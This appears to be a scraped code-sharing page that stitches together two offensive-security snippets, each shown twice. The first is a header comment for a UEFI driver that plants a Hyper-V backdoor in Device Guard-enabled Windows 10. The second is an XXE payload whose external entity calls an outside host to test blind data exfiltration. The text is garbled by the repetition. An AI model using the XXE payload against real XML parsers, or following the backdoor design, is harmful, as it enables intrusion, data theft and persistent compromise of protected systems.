STEFANOS METZIDAKIS biodeveloper

## DmaHvBackdoor.c
/*
 *********************************************************************

  Part of UEFI DXE driver code that injects Hyper-V VM exit handler
  backdoor into the Device Guard enabled Windows 10 Enterprise.

  Execution starts from new_ExitBootServices() -- a hook handler
  for EFI_BOOT_SERVICES.ExitBootServices() which being called by
  winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
  transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
	/*
	*********************************************************************

	Part of UEFI DXE driver code that injects Hyper-V VM exit handler
	backdoor into the Device Guard enabled Windows 10 Enterprise.

	Execution starts from new_ExitBootServices() -- a hook handler
	for EFI_BOOT_SERVICES.ExitBootServices() which being called by
	winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
	transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>